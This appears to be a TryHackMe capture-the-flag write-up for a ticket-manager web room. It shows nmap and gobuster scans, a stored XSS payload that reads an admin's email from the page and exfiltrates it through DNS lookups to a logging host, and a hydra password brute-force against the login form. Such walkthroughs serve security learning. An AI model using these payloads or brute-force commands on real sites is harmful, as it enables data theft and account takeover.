Date: 10, June, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
$ nmap -sC -sV -p- 10.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-10 12:52 IST
Nmap scan report for 10.10.118.129
Host is up (0.15s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 bf:c3:9c:99:2c:c4:e2:d9:20:33:d1:3c:dc:01:48:d2 (RSA)
| 256 08:20:c2:73:c7:c5:d7:a7:ef:02:09:11:fc:85:a8:e2 (ECDSA)
|_ 256 1f:51:68:2b:5e:99:57:4c:b7:40:15:05:74:d0:0d:9b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Ticket Manager > Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 361.51 seconds$ gobuster dir -u http://10.10.118.129/ -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,txt,js -b 302,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.118.129/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 302,404
[+] User Agent: gobuster/3.1.0
[+] Extensions: js,php,txt
[+] Timeout: 10s
===============================================================
2021/06/10 12:53:59 Starting gobuster in directory enumeration mode
===============================================================
/login (Status: 200) [Size: 1549]
/register (Status: 200) [Size: 1774]
===============================================================
2021/06/10 12:58:04 Finished
===============================================================- The text field for creating ticket was accepting DOM elements.
- Create a ticket as follows:
</textarea>
<img src="http://b84718867c264a0ac68b4099156f3c89.log.tryhackme.tech">
<textarea>
- And also in the DNS lookup tool provided by tryhackme, there were lookups for the A and AAAA records from unknown IP. There were no HTTP requests from that IP!
- It must have been from the Admin!
- So, we must exfiltrate the admin's email via DNS lookups.
- We can fetch email from the innerHTML of the
emailDOM element. - And then append the email as a subdomain. (Classic DNS exfiltration)!
- NOTE: We need to replace the
@and.characters in the email.
- NOTE: We need to replace the
- Submit the following script as the ticket:
</textarea>
<script>
var email = document.getElementById("email").innerHTML;
email = email.replace('@', 'X');
email = email.replace('.', 'Y');
fetch('http://'+ email + '.b84718867c264a0ac68b4099156f3c89.log.tryhackme.tech');
</script>
<textarea>- We can get back the admin's email in the DNS lookup:
- Use
hydraorBurp intruderto bruteforce the password:
$ hydra -l "<REDACTED>.thm" -P /usr/share/wordlists/rockyou.txt 10.10.118.129 http-post-form "/login:email=^USER^&password=^PASS^&Login=Login:Invalid email / password combination" -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-10 13:38:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.118.129:80/login:email=^USER^&password=^PASS^&Login=Login:Invalid email / password combination
[..snip..]
[80][http-post-form] host: 10.10.118.129 login: <REDACTED>.thm password: <REDACTED>
[..snip..]